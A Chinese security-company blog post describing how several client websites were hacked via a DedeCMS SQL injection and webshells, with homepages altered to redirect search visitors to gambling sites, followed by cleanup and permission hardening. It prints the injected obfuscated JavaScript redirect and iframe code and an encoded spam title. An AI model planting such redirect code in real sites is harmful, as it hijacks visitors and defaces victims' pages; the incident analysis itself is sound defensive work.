网站被黑提醒该站点可能受到黑客攻击,部分页面已被非法篡改

  1. 云栖社区>
  2. 博客>
  3. 正文

网站被黑提醒该站点可能受到黑客攻击,部分页面已被非法篡改

网站安全 2019-01-25 15:01:52 浏览1814
展开阅读全文

大清早的一上班收到3个网站客户的QQ联系,说是自己公司的网站被跳转到了北京sai车,cai票,du博网站上去了,我们SINE安全公司对3个网站进行了详细的安全检测,发现这3个客户的网站都是同样的症状,网站首页文件index.php,index.html都被篡改添加了恶意的代码。网站在百度的快照也被更改成了这些cai票,bo彩的内容了,并被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!如下图所示:

37870b157ba043dfa2ffe9d4d799bb65.png

从百度点击网站进去,会直接跳转到bo彩,du博网站上去,直接输入3个公司的网站地址是不会跳转的,点击跳转的时候会被360拦截掉,提示如下图:

b31cc165eeb4442bb14716cbf6b03417.png

360安全中心提醒您:未经证实的bo彩du博网站,您访问的网站含有未经证实的境外bo彩或非法du博的相关内容,可能给您造成财产损失,请您谨慎访问。

我们SINE安全技术通过对3个客户网站的代码的安全分析,发现都被攻击者上传了网站木马后门,php大马,以及一句话木马后门都被上传到了客户网站的根目录下,网站的首页文件都被篡改了,包括网站的标题,描述,TDK都被改成了bo彩,cai票,du博的内容,客户说之前还原了网站首页文件,过不了多久还是被篡改,被跳转,导致客户网站在百度的权重直接降权,网站在百度的关键词排名都掉没了,损失惨重。网站被反复篡改的原因根本是网站代码存在漏洞,需要对网站漏洞进行修复,以及做好网站安全加固,清除木马后门才能彻底的解决问题。

我们来看下网站首页被篡改的症状:

title keywords deion都被篡改了,内容都是加密的字符:

<title>&#65279&#x5317&#x4eac&#36187&#x8f66&#112&#107&#49&#x30&#32&#80&#x4b&#x31&#x30&#24320&#x5956&#x76f4&#25773&#x20&#21271&#20140&#x8d5b&#36710&#112&#x6b&#49&#x30&#24320&#22870&#x8bb0&#24405&#45&#112&#107&#x31&#x30&#x5f00&#22870&#35270&#39057&#30452&#25773</title>

342da603f6114a949c798b9b7a27a3ed.png

通过url解密发现这些内容都是北京sai车,北京pk10,pk10北京PK开奖等cai票的网站关键词,简单来讲就是网站的标题内容都被攻击者改成了cai票,bo彩的标题,利用网站自身在百度的权重,做他们自己的关键词排名。

网站被跳转的代码也被我们SINE安全技术找了出来,如下:

function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14' + '00" height="8' + '50" src="att=rgyh8"></iframe></center>'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

知道问题的所在,以及网站被攻击的症状,那么该如何解决问题?

首先登陆客户网站的服务器,打包压缩客户的网站代码下载到我们本地的工作电脑,对其进行详细的安全检测,以及网站漏洞检测,网站木马后门检测,以及网站日志下载分析,发现其中一个网站使用的是dedecms系统开发网站,网站存在sql注入漏洞,导致网站的管理员账号密码被sql注入获取到,默认的管理员后台地址dede没有改,导致攻击者直接登录后台上传了木马到网站里了。针对dedecms的sql注入漏洞进行了修复,清除掉网站存在的木马后门,对网站安全进行加固问题得以解决。

对dedecms的目录安全权限进行设置 /data目录取消脚本执行权限,给与写入权限,templets模板文件夹也是同样的安全部署,取消php脚本的执行权限,开启写入权限,dede后台的目录给只读权限,uploads上传目录给写入,取消php脚本权限。

至此客户网站首页被篡改的问题得以解决,百度的拦截也是需要去除的,清除恶意链接代码,修复网站漏洞,防止以后网站被篡改,做好网站安全后,再提交给百度安全中心人工审核,就可以解除百度的拦截,如果您对网站漏洞修复不熟悉的话,可以找我们SINE安全来修复网站漏洞,解决百度拦截。

网友评论

登录后评论
0/500
评论
网站安全
+ 关注